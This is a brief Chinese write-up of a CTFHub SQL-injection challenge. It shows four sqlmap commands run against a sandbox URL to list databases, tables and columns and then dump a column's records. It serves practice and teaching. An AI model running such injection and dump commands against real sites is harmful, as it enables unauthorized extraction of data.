使用 SQLMap 自动化注入
查询数据库信息
sqlmap -u "http://challenge-99f200da0094c198.sandbox.ctfhub.com:10800/?id=1" --batch --threads 4 --dbs
我们关注名字为sqli的数据库。
查询数据库中的表
sqlmap -u "http://challenge-99f200da0094c198.sandbox.ctfhub.com:10800/?id=1" --batch --threads 4 -D sqli --tables
我们关注名为vdudwbjbcr的表。
查询表结构
sqlmap -u "http://challenge-99f200da0094c198.sandbox.ctfhub.com:10800/?id=1" --batch --threads 4 -D sqli -T vdudwbjbcr --columns
该表有 1 个字段,名为icspfqhewd。
查询表里的记录
sqlmap -u "http://challenge-99f200da0094c198.sandbox.ctfhub.com:10800/?id=1" --batch --threads 4 -D sqli -T vdudwbjbcr -C icspfqhewd --dump
若有收获,就点个赞吧
0 人点赞
